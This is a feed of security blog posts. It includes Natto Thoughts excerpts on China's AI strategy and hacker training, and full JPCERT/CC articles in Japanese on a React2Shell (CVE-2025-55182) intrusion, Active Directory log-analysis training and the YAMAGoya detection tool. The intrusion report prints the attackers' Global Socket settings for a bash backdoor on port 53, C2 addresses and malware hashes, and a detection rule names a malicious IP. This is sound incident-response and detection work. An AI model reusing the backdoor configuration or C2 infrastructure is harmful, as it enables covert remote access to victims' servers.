When the Chinese start-up <a href="https://api-docs.deepseek.com/news/news1210">DeepSeek launched</a> its artificial intelligence (AI) chatbot in December 2024, many Americans suddenly realized that <a href="https://www.nytimes.com/2025/05/19/opinion/china-us-trade-tariffs.html">China could compete in AI.</a> News of this breakthrough sparked debate on whether <a href="https://www.wired.com/story/stanford-study-global-artificial-intelligence-index/">China could win the AI race</a> and <a href="https://www.economist.com/china/2025/05/25/xi-jinpings-plan-to-overtake-america-in-ai">surpass the dominance</a> of the United States in AI and on <a href="https://www.foreignaffairs.com/united-states/what-if-china-wins-ai-race">the implications if China were to succeed.</a> In April 2025, Chinese President Xi Jinping delivered <a href="https://cset.georgetown.edu/publication/xi-politburo-collective-study-ai-2025/">remarks</a> on artificial intelligence during a Politburo study session on AI, Xi’s first pronouncement on the subject since 2018. “Persist in Being Self-Reliant, Be Strongly Oriented Toward Applications, and Push the Orderly Development of Artificial Intelligence,” was Xi’s main message, according to a Chinese state media summary of his speech. <a href="https://digichina.substack.com/p/xis-ai-message-to-the-politburo-analyzed">Experts suggested</a> that Xi’s comments signaled China’s determination to achieve AI supremacy. China has come a long way since the release of the State Council’s <a href="https://www.newamerica.org/cybersecurity-initiative/digichina/blog/full-translation-chinas-new-generation-artificial-intelligence-development-plan-2017/">New Generation Artificial Intelligence Development Plan</a> in 2017. Back then, Chinese schola… <a href="https://www.nattothoughts.com/p/debating-chinas-ai-path-alternative"> Read more </a>
Butian Vulnerability Platform: Forging China's Next Generation of White Hat Hackers

Wed, 25 Jun 2025 16:01:18 -0000

From 'Trouser Belt Project' to 'Patching the Sky': Qi An Xin’s Butian platform serves as cradle for nurturing new talent and smelter for refining seasoned hackers’ skills

In our<a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from"> previous posting</a>, Natto Thoughts pointed out the Chinese cyberdefense mindset that, in order to protect one's own business or country, one needs to develop offensive skills. In other postings, the Natto Team has profiled various<a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes"> institutes</a>,<a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber"> cyber ranges</a>,<a href="https://nattothoughts.substack.com/p/the-pangu-teamios-jailbreak-and-vulnerability"> vulnerability research labs</a>, and<a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking"> hacking competitions</a> that companies sponsor in order to nurture China's defensive talent through "attack-defense live-fire exercises" (攻防实战演习) and other offensive skills. One prominent entity that brings these all together and has helped set the standard for this type of training is the<a href="https://www.butian.net/"> Butian (or Bu Tian) Vulnerability Response Platform</a> (补天漏洞响应平台) (Butian Platform). It appears designed to coopt would-be black-hat criminal hackers and young students and mold them into socially useful white-hat hackers, training them to defend China. Along the way, they also develop skills that can be used offensively against China's enemies. The term “white hat talent” (白帽人才) has been frequently used in the Chin… <a href="https://www.nattothoughts.com/p/butian-vulnerability-platform-forging"> Read more </a>
Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry

Wed, 11 Jun 2025 16:03:00 -0000

The belief that offense enables defense in cyberspace, first rooted in China’s 1990s hacker culture, has since permeated the country’s cyber ecosystem

Across the globe, a core tenet is gradually gaining traction in the cyber domain: passive defense alone is not enough. A limited but growing number of states have embraced some form of active defense—the idea that effective cybersecurity requires not just detection and response, but also preemptive action to disrupt adversaries.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a>In the United States, this principle is formally codified in the 2018 Department of Defense Cyber Strategy under the doctrine of “Defend Forward,” authorizing U.S. Cyber Command and the NSA to proactively disrupt threats within adversaries’ own networks. Variations of this approach <a href="https://www.darkreading.com/cybersecurity-operations/japan-offense-new-cyber-defense-bill">have since been adopted</a> by other governments. In China, the concept of active defense <a href="https://www.andrewerickson.com/wp-content/uploads/2019/05/DoD_China-Report_2019.pdf">is grounded</a> in longstanding military strategy. Although this principle extends to cyberspace - <a href="https://www.gov.cn/zhengce/2015-05/26/content_2868988.htm#">as outlined in China’s 2015 military strategy</a> - China has not yet articulated a dedicated active cyber defense doctrine comparable to that of the United States.Yet in practice, China’s cyber ecosystem refl… <a href="https://www.nattothoughts.com/p/defense-through-offense-mindset-from"> Read more </a>
From Humble Beginnings: How a Vocational College Became a Vulnerability Powerhouse

Wed, 28 May 2025 16:01:52 -0000

Qingyuan Polytechnic's focus on vulnerability studies highlights China's continued efforts in gathering vulnerability resources

In one of the <a href="https://nattothoughts.substack.com/p/i-soon-kicking-off-the-year-of-the">famously leaked chat messages</a> among members of i-SOON – the Chinese information security company allegedly linked to the <a href="https://www.fbi.gov/wanted/cyber/aquatic-panda-cyber-threat-actors">AQUATIC PANDA</a> threat group – group leader <a href="https://nattothoughts.substack.com/i/142403030/alternative-route-to-recruit">“Shutdown” declared</a> in 2020, “People who have attack and defense live-fire capabilities do not need degrees from elite universities.” He called for recruiting talented students from less-prestigious technical or regional educational institutions. One such institution rocketed to prominence on May 16 of this year. Qingyuan Polytechnic – a vocational school from a third-tier city<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> – was one of three higher education institutes honored as Outstanding Universities of the Year for Cooperation at the <a href="https://www.cnnvd.org.cn/home/childHome">China National Vulnerability Database of Information Security</a> (CNNVD)’s <a href="https://www.secrss.com/articles/78809">2024 Annual Work Review and Outstanding Recognition Conference</a>.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> The other recipients were Beihang University (北京航空航天大学) and Guangzhou University (广州大学), both well-known four-year universities.At the conference, a number of prominent information securi… <a href="https://www.nattothoughts.com/p/when-a-vocational-college-becomes"> Read more </a>
React2Shellを悪用する複数の攻撃アクターによる侵害事例

Fri, 13 Feb 2026 02:00:00 -0000

2025年12月3日（現地時間）、React Server Components...

2025年12月3日（現地時間）、React Server Components（RSC）における認証不要のリモートコード実行の脆弱性（<a href="https://www.jpcert.or.jp/newsflash/2025120501.html" target="_blank">CVE-2025-55182</a>）が公開されました。JPCERT/CCでは、この攻撃の被害報告を複数受けています。その中で、本脆弱性を短期間のうちに複数の攻撃アクターに悪用され、Webサイト改ざんなど複数の被害が同時に発生した事案がありました。今回は容易に悪用可能な脆弱性が公表された場合に、攻撃者がいかに迅速かつ無差別に攻撃を行っているかを攻撃のタイムラインや使用されたマルウェアの紹介とあわせて解説します。このような深刻な脆弱性が公開された場合に、どのくらいのスピード感で対策を進めなければならないかという参考になればと思います。 <h3>攻撃のタイムライン</h3> 表1は今回紹介する事案で判明した攻撃のタイムラインです。（被害組織の特定につながる恐れがあるため、以降の一部のURLパスや識別子などはマスクしています） <table border="1" width="100%"> <caption>表1：攻撃のタイムライン</caption> <thead> <tr> <th><div style="text-align: center;">日時（JST）</div></th> <th><div style="text-align: center;">内容</div></th> </tr> </thead> <tbody> <tr> <td align="left">2025-12-05 15:52</td> <td>コインマイナー（sex.sh、xmrig）の設置</td> </tr> <tr> <td align="left">2025-12-06 07:28</td> <td>コインマイナー（sex.sh.1）の設置</td> </tr> <tr> <td align="left">2025-12-06 09:53、10:09、11:00</td> <td>HISONIC（javax）バックドアの設置</td> </tr> <tr> <td align="left">2025-12-06 15:00</td> <td>Global Socket（npm-cli）をcron経由で毎時実行</td> </tr> <tr> <td align="left">2025-12-06 19:31</td> <td>SNOWLIGHTのダウンローダー（javas）、CrossC2（rsyslo）の設置</td> </tr> <tr> <td align="left">2025-12-07 12:24</td> <td>コインマイナー（xmrig）の設置</td> </tr> <tr> <td align="left">2025-12-07 16:51</td> <td>/tmp/kernal（kernelに偽装）を毎分実行するようにcron設定を書き替え</td> </tr> <tr> <td align="left">2025-12-07 19:46</td> <td>サイト改ざん（警告メッセージの表示）</td> </tr> <tr> <td align="left">2025-12-07 22:15</td> <td>サービス利用者からの報告によって発覚</td> </tr> </tbody> </table> React2Shellの脆弱性が2025年12月3日に公開されてからわずか2日後にはコインマイナーの設置を狙った攻撃が行われており、それを皮切りに複数の攻撃者によってRATやバックドアなどのさまざまなマルウェアが設置・実行され、一つのサーバー上に複数の攻撃者が侵入している状況が見られました。 また、上記のタイムライン以外にも、2025年12月5日～7日の期間でWebサーバーのアクセスログ上に100を超えるIPアドレスからReact2Shellの脆弱性を狙ったと思われる不審なHTTP POST通信（アクセスログにはリクエストヘッダーやPOSTデータは記録されていなかったため、UserAgentやリクエストパス、レスポンスサイズなどをもとに推定）が観測されており、実際にはさらに多くの攻撃者から侵害を受けていた可能性もあります。 <h3>発端となったWebサイト改ざん</h3> 今回の事案は、攻撃者によってWebサイトが改ざんされていることに気づいたWebサイト利用者からの報告によって侵害が発覚しました。改ざんされたWebサイトでは、4カ国語で「CVE-2025-55182の脆弱性があるため、早急にパッチの適用が必要」といった警告が表示されていました。図1は改ざんされたWebページの例です。 <figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig1-640wri.png" width="800" height="347" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>図1：改ざんされたWebページ</figcaption></figure> 上記の改ざんは国内外問わず複数のWebサイトで確認されており、いずれも早急な脆弱性対処を促す文面が記載されていました。図2は検索エンジンで表示された改ざんサイトの例です。 <figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig2-640wri.png" width="800" height="398" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>図2：Google検索結果</figcaption></figure> <h3>設置されたマルウェア</h3> 今回の事案ではさまざまなマルウェアやオープンソースツールが悪用されていました。表2は設置されていたマルウェアの一覧です。（設定ファイルなどは除く） <table border="1" width="100%"> <caption>表2：設置されたマルウェア</caption> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">ファイル名</div></th> <th><div style="text-align: center;">内容</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>sex.sh</td> <td>xmrigのダウンロード用bashスクリプト</td> </tr> <tr> <td>2</td> <td>sex.sh.1</td> <td>xmrigのダウンロード用bashスクリプト</td> </tr> <tr> <td>3</td> <td>miner.sh</td> <td>xmrigの起動用bashスクリプト</td> </tr> <tr> <td>4</td> <td>xmrig</td> <td>xmrigコインマイナー</td> </tr> <tr> <td>5</td> <td>javax</td> <td>HISONICバックドア</td> </tr> <tr> <td>6</td> <td>javas</td> <td>SNOWLIGHTのダウンロード用bashスクリプト</td> </tr> <tr> <td>7</td> <td>rsyslo</td> <td>CrossC2 RAT</td> </tr> <tr> <td>8</td> <td>npm-cli</td> <td>Global Socket ツール</td> </tr> <tr> <td>9</td> <td>kernal</td> <td>削除されていたため詳細不明</td> </tr> </tbody> </table> 興味深い点として、一般的な金銭目的のコインマイナーの他に、UNC5174が利用すると言われているSNOWLIGHT<a href="#1">[1]</a>のダウンローダーや、UNC6603が利用すると言われているGolangで作成されたHISONICバックドア<a href="#2">[2]</a>、またSNOWLIGHTと同時刻に設置されていたLinux版のCobalt Strike実装であるCrossC2 RAT<a href="#3">[3]</a>などが確認されており、攻撃者の明確な目的は不明ですが、将来の攻撃基盤として悪用しようとしていた可能性も考えられます。 また、他のセキュリティベンダーの事例ではあまり見られないものとして、オープンソースツールであるGlobal Socket（gsocket）<a href="#4">[4]</a>の悪用も確認されました。本ツールは、NAT配下やファイアウォールなど直接到達できない2台の端末同士でも、中継ネットワークであるGSRN（Global Socket Relay Network）を介して接続を行えるようにするためのツールです。特徴として、同一の事前共有鍵を持っている端末間で通信できる仕組みになっており、通信はエンドツーエンドで暗号化され、GSRNは暗号化されたトラフィックだけを中継します。 今回、攻撃者は実行時に以下のような環境変数とオプションを指定しており、npm-cli.datを秘密ファイルとして使用し、主にDNS通信で利用される53番ポートで外部からbash経由で操作できるようにバックドアとして悪用していました。 <pre> GS_PORT='53' SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/***/.config/dbus/npm-cli.dat -liqD" </pre> <h3>おわりに</h3> 今回のReact2Shellの脆弱性は公表されてから攻撃ツールの中に迅速に組み込まれ、わずか数日で多くのアクターによって悪用されている状況が観測されました。攻撃者によって脆弱性を悪用される速度は非常に早く、重大な脆弱性が公表された場合には早急な影響範囲の確認とパッチ適用などの対処が重要です。 また、悪用が確認されている脆弱性の対応を行う際にはパッチ適用とあわせて侵害有無の確認が必要です。今回の事案のように目に見えるサイト改ざん以外により深刻な侵害を受けている可能性も考えられるため、他に影響を受けている箇所がないかを慎重に調査いただくことを推奨します。 なお、今回紹介したマルウェアの通信先などについては、Appendixに記載していますのでご確認ください。 インシデントレスポンスグループ喜野孝太、矢野雄紀 <h3>参考情報</h3> <a name="1"></a>[1] UNC5174のWindows版マルウェアSNOWLIGHT <a href="https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/" target="_blank" rel="noopener">https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/</a> <a name="2"></a>[2] Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182" target="_blank" rel="noopener">https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182</a> <a name="3"></a>[3] Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻撃 <a href="https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html" target="_blank" rel="noopener">https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html</a> <a name="4"></a>[4] Global Socket <a href="https://github.com/hackerschoice/gsocket" target="_blank" rel="noopener">https://github.com/hackerschoice/gsocket</a> <h4>Appendix A：通信先</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">通信先</div></th> <th><div style="text-align: center;">用途</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>45.143.131[.]123:59999</td> <td>SNOWLIGHTのダウンロード元／C2サーバー</td> </tr> <tr> <td>2</td> <td>154.89.152[.]240:443</td> <td>CrossC2のC2サーバー</td> </tr> </tbody> </table> <h4>Appendix B：マルウェアのハッシュ値</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">ハッシュ値（SHA-256）</div></th> <th><div style="text-align: center;">ファイル名</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>5bae25736a09de5f4a0f9761d2b7bfa81ca8dba39de2a724473c9d021a65daa9</td> <td>sex.sh</td> </tr> <tr> <td>2</td> <td>ba43e447e63611d365300bf2e8e43ccb02ea112778d0d555ef9a9ccf6169808b</td> <td>sex.sh</td> </tr> <tr> <td>3</td> <td>ac3e12fa0aa4d6e4eed322e81ecf708a8c9bea29247ae6b26cc39d3b3a6c2fb8</td> <td>miner.sh</td> </tr> <tr> <td>4</td> <td>a536d755313ce550a510137211eca6171f636fb316026e9df8523c496c8fcd12</td> <td>xmrig</td> </tr> <tr> <td>5</td> <td>0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657</td> <td>xmrig</td> </tr> <tr> <td>6</td> <td>1a1edbea47162b1aa844252fcd4fb97f2a67faec1993e7819efc6a04b7c15552</td> <td>javax</td> </tr> <tr> <td>7</td> <td>0d07a974993221305ca7af139b73d9de1dcd992f553215e4f041e830a2d82729</td> <td>javas</td> </tr> <tr> <td>8</td> <td>5baa52387daedea5e3e00adf96ecacb4a2cdc98100664f29ac86e8e4a423baaf</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>9</td> <td>c1a9cfc62626118bd9f54e401fd52ecd2d766a5e8a69dbc7db909ea5c987fcc0</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>10</td> <td>4a74676bd00250d9b905b95c75c067369e3911cdf3141f947de517f58fc9f85c</td> <td>rsyslo</td> </tr> <tr> <td>11</td> <td>cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78</td> <td>npm-cli</td> </tr> </tbody> </table>
Windowsのイベントログ分析トレーニング用コンテンツの公開

Tue, 10 Feb 2026 02:00:00 -0000

はじめに JPCERT/CCは、標的型攻撃によってセキュリティインシデント（以下...

 <h3>はじめに</h3> JPCERT/CCは、標的型攻撃によってセキュリティインシデント（以下「インシデント」）が発生した際の調査手法に関するトレーニングコンテンツ資料（以下「本コンテンツ」）を公開しました。実際のインシデントにおいて、外部に公開している機器の脆弱性や設定不備を突かれることによって内部ネットワークに侵入され、最終的にActive Directoryの管理者権限を侵害されるといった手法が増加しています。このことから、本コンテンツはActive Directoryに注目したトレーニングコンテンツとして作成しました。 ログ分析トレーニングバージョン2 <a href=" https://github.com/JPCERTCC/log-analysis-training_v2/">https://github.com/JPCERTCC/log-analysis-training_v2/</a> なお、本コンテンツは三井物産セキュアディレクション株式会社の協力によって制作しました。 <h3>トレーニングコンテンツの概要</h3> インシデント対応は、検知 → 初動調査 → 一時対処 → 本格調査 → 報告 → 恒久対策という流れで行われることが多く、本コンテンツは初動調査に特化しています。基礎編と実践編で構成しており、基礎編で習得できる内容は次のとおりです。 <ul> <li>一般的な社内ネットワークの構成</li> <li>Directory Service</li> <li>Active Directory</li> <li>ドメインコントローラー</li> <li>ドメインとフォレスト</li> <li>ADにおける認証／認可</li> <li>Kerberos認証</li> <li>NTLM認証</li> <li>リモート認証とローカル認証</li> <li>グループポリシーオブジェクト</li> <li>攻撃者のネットワーク侵入手法</li> <li>Pass-the-Hash</li> <li>Pass-the-Ticket</li> <li>NTDSダンプ</li> <li>Kerberoast（Kerberoasting攻撃）</li> <li>NTLMリレー攻撃</li> <li>イベントビューアーの見方</li> </ul> <h3>トレーニングコンテンツの詳細</h3> 本コンテンツでは基本的なドメインコントローラーの説明からActive Directoryにおける認証、認可の解説などを行っており、インシデント調査、分析に関する基礎的な知識の習得が可能です。 <img class="asset asset-image at-xid-4014994 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092857-320wri.png" alt="" width="320" height="180"> <img class="asset asset-image at-xid-4014961 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092927-320wri.png" alt="" width="320" height="180"> 加えて、標的型攻撃において攻撃者が行うネットワーク侵入の手法や、その手法に対して必要なWindowsのイベントログの調査手法を学習することができます。 <img class="asset asset-image at-xid-4015076 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093223-320wri.png" alt="" width="320" height="180"> <img class="asset asset-image at-xid-4015078 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093252-320wri.png" alt="" width="320" height="180"> 実践編は、基礎編で学習した内容をもとに、シナリオをベースにイベントビューアーでWindowsイベントログを分析して攻撃のタイムラインを構築するトレーニングとして活用できる内容になっています。 <img class="asset asset-image at-xid-4015079 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093642-320wri.png" alt="" width="320" height="180"> <h3 class="MsoNormal">さいごに</h3> 本コンテンツは、Windowsイベントログをイベントビューアーで分析する内容です。実際のインシデントではログ自体が膨大であったり、ログ同士の関連を調査するにあたってはイベントビューアーでの分析だけでは難しかったりするため、イベントビューアー以外の分析方法も普段からトレーニングしておくことで、実際の調査をスムーズにすることができます。 なお、JPCERT/CCではこうした実際のインシデント発生時のWindowsイベントログの分析をサポートするツール「LogonTracer」をリリースしています。 LogonTracer <a href="https://github.com/JPCERTCC/LogonTracer">https://github.com/JPCERTCC/LogonTracer</a> 平時にこのようなツールを利用したWindowsイベントログの調査手法を確立し、インシデント調査の演習を行うことで、実際のインシデントが発生した場合に備えていただくことを推奨します。
SigmaおよびYARAルールを活用したリアルタイムクライアント監視ツールYAMAGoya

Tue, 18 Nov 2025 02:00:00 -0000

近年、ファイルレスマルウェアやマルウェアの難読化により、ファイル単体のスキャンだ...

近年、ファイルレスマルウェアやマルウェアの難読化により、ファイル単体のスキャンだけでは不審なアクティビティを検知することが難しくなっています。そのような脅威に対抗するために、セキュリティ研究者やマルウェアアナリストは、SigmaやYARAなどのルールを積極的に作成し、公開しています。しかし、既存のエンドポイントセキュリティツールでは、独自の検知エンジンを用いているため、SigmaやYARAを直接活用できる製品が不足しているのが現状です。この課題に対し、オープンソースのスレットハンティングツールYAMAGoyaを公開しました。YAMAGoyaは、次のGitHubレポジトリで公開していますので、ご自由にお使いください。 GitHub JPCERTCC/YAMAGoya：<a href="https://github.com/JPCERTCC/YAMAGoya" title="YAMAGoya" target="_blank">https://github.com/JPCERTCC/YAMAGoya</a> <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig1-640wri.png" width="640" height="424" alt="YAMAGoyaの起動画面" class="asset asset-image at-xid-3934285 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図1：YAMAGoyaの起動画面</figcaption></figure> 以降では、YAMAGoyaのコンセプトや使用方法について紹介します。 <h3>YAMAGoyaのコンセプト</h3> YAMAGoyaは、ETW（Event Tracing for Windows）のイベント監視とメモリスキャンをあわせて脅威の検知を行えるように設計しています。以下は、本ツールの特徴です。 <ul> <li>ユーザーランドのみで動作：カーネルドライバー不要で導入容易</li> <li>リアルタイム監視：ファイル／プロセス／レジストリ／DNS／ネットワーク／PowerShell／WMI等をETW経由でリアルタイム監視可能</li> <li>複数のルール形式をサポート：Sigmaおよび相関分析に活用できるオリジナルYAMLルールをサポート</li> <li>メモリスキャン：ファイルレスやパッキングされたマルウェアをYARAルールで検知</li> <li>GUI／CLIサポート：GUIからの使用だけではなくコマンドラインによる自動化なども可能</li> </ul> <h3>導入方法</h3> <h4>バイナリ入手</h4> すぐに評価したい場合は、<a href="https://github.com/JPCERTCC/YAMAGoya/releases" title="GitHubレポジトリのReleases" target="_blank">GitHubレポジトリのReleases</a>からバイナリを取得できます。 <h4>ビルド</h4> ソースコードからビルドする場合は、<a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md" title="YAMAGoya_README" target="_blank">README</a>をご覧ください。 <h3>使い方</h3> YAMAGoyaは、GUIおよびCLIで使用することが可能です。コマンドラインからオプションなしで実行するか、ダブルクリックで実行することでGUIが起動します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # GUIの実行 > YAMAGoya.exe </pre> 本ツールは、管理者権限で実行する必要があります（ETWセッションを起動するため）。ツールを実行する際は、右クリックから「管理者として実行」を選択するか、コマンドプロンプトを管理者として実行するようにしてください。 コマンドラインからは、次のように実行することで利用可能です。その他のオプションについては、オプションhelpで確認してください。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # Sigmaルールで監視 > YAMAGoya.exe --session --sigma "C:\Rules\Sigma" --all </pre> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # YARAルールでメモリスキャン > YAMAGoya.exe --session --yara "C:\Rules\YARA" --all </pre> <h3>YAMAGoyaのサポートルール</h3> YAMAGoyaは、SigmaルールおよびYARAルールをサポートしていますので、公開されているルールなどを活用してください。Sigmaルールに関しては、サポートするカテゴリーがWindows OSを対象とするものに限られています。詳しくは、<a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md#sigma%25E3%2581%258B%25E3%2582%2589etw%25E3%2581%25B8%25E3%2581%25AE%25E3%2583%259E%25E3%2583%2583%25E3%2583%2594%25E3%2583%25B3%25E3%2582%25B0" title="YAMAGoya_README" target="_blank">README</a>をご覧ください。 本ツールでは、SigmaルールおよびYARAルール以外にもオリジナルYAMLルールをサポートしています。以下では、オリジナルYAMLルールの書き方について紹介します。 <h4>オリジナルYAMLルールの書き方</h4> オリジナルYAMLルールを作成するには、以下のスキーマに従ってください。各ルールファイルには以下を含める必要があります： <pre style='padding: 10px 10px;color:#1a1a1a;background:#f5f0f0;overflow: auto;white-space: pre'> - rulename: ルールの一意の名前 - description: ルールが検知する内容の説明 - rules: ルール項目のリスト。各項目には以下を含める必要があります： - ruletype: ルールの種類（例：regex、binary） - target: マッチするイベントカテゴリー - rule: マッチするパターンまたは値（正規表現ルールの場合は有効な正規表現） </pre> targetのカテゴリーには表1のものを使用できます。 <table> <thead> <caption>表1：target一覧</caption> <tr> <td style="background-color: #bdbdbd; width: 100px; text-align: center;">target名</td> <td style="background-color: #bdbdbd; width: 400px; text-align: center;">説明</td> </tr> </thead> <tbody> <tr> <td>file</td> <td>ファイル作成イベント</td> </tr> <tr> <td>delfile</td> <td>ファイル削除イベント</td> </tr> <tr> <td>process</td> <td>プロセスイベント</td> </tr> <tr> <td>open</td> <td>OpenProcess</td> </tr> <tr> <td>load</td> <td>DLL読み込みイベント</td> </tr> <tr> <td>registry</td> <td>レジストリイベント</td> </tr> <tr> <td>dns</td> <td>DNSイベント</td> </tr> <tr> <td>ipv4</td> <td>IPv4ネットワークイベント</td> </tr> <tr> <td>ipv6</td> <td>IPv6ネットワークイベント</td> </tr> <tr> <td>shell</td> <td>シェル関連イベント（RunKey、ショートカット）</td> </tr> <tr> <td>powershell</td> <td>PowerShell実行イベント</td> </tr> <tr> <td>wmi</td> <td>WMIコマンド実行イベント</td> </tr> </tbody> </table> デフォルトでは、1ファイルに記述したすべてのruleが10秒以内に確認された場合に、アラートが上がります。例えば、次のようなファイルの作成、プロセスの実行、DLLのロード、通信をしている場合にマルウェアとして検知することができるルールを記述することができます。オリジナルYAMLルールは、このような複数のアクティビティを相関的に確認して検知したい場合に有効です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> rulename: "ANEL" description: "Detects ANEL from maldoc type" rules: - ruletype: "regex" target: "file" rule: "Tmp\\.docx$" - ruletype: "regex" target: "process" rule: "ScnCfg32\\.Exe$" - ruletype: "regex" target: "dll" rule: "vsodscpl\\.dll$" - ruletype: "regex" target: "file" rule: "TCDolW0p\\.log$" - ruletype: "ipv4" target: "ipv4" rule: "45.32.116.146" </pre> <h3>ログの確認</h3> GUIで使用する場合は、アラートタブでログを確認することができます。また、図2のアラートタブのOpen Log Fileから、テキストログを確認することもできます。 <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig2-640wri.png" width="640" height="423" alt="YAMAGoyaのアラートタブ" class="asset asset-image at-xid-3934286 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図2：YAMAGoyaのアラートタブ</figcaption></figure> さらに、イベントログ（Application）にもアラートは保存されます。表2は、YAMAGoyaが記録するイベントID一覧です。 <table> <thead> <caption>表2：YAMAGoyaが記録するイベントログID一覧（Application）</caption> <tr> <td style="background-color:#bdbdbd; width:100px; text-align:center;">イベントID</td> <td style="background-color:#bdbdbd; text-align:center;">主なトリガー条件</td> </tr> </thead> <tbody> <tr> <td style="text-align:center;">8001</td> <td>オリジナルYAMLルールでの検知</td> </tr> <tr> <td style="text-align:center;">8002</td> <td>オリジナルYAMLルールの一部要素がマッチ（デバッグメッセージ）</td> </tr> <tr> <td style="text-align:center;">8003</td> <td>オリジナルYAMLルールで検知したプロセスの停止（Killモードの動作時）</td> </tr> <tr> <td style="text-align:center;">8005</td> <td>WinRM アウトバウンド通信</td> </tr> <tr> <td style="text-align:center;">8006</td> <td>WinRM インバウンド通信</td> </tr> <tr> <td style="text-align:center;">8008</td> <td>Security Mitigationsイベント</td> </tr> <tr> <td style="text-align:center;">8009</td> <td>Security Adminlessイベント検知</td> </tr> <tr> <td style="text-align:center;">8011</td> <td>Security CVEイベント検知</td> </tr> <tr> <td style="text-align:center;">8012</td> <td>SMBサーバー認証検知</td> </tr> <tr> <td style="text-align:center;">8013</td> <td>SMBサーバーファイルシェア検知</td> </tr> <tr> <td style="text-align:center;">8014</td> <td>SMBサーバーファイルシェアの追加検知</td> </tr> <tr> <td style="text-align:center;">8015</td> <td>SMBクライアント接続失敗</td> </tr> <tr> <td style="text-align:center;">8016</td> <td>SMBクライアントファイル転送</td> </tr> <tr> <td style="text-align:center;">8017</td> <td>ETWセッションのスタート</td> </tr> <tr> <td style="text-align:center;">8018</td> <td>ETWセッションの停止</td> </tr> <tr> <td style="text-align:center;">9001</td> <td>Sigmaルールでの検知</td> </tr> <tr> <td style="text-align:center;">9002</td> <td>Sigmaルールで検知したプロセスの停止（Killモードの動作時）</td> </tr> </tbody> </table> <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" 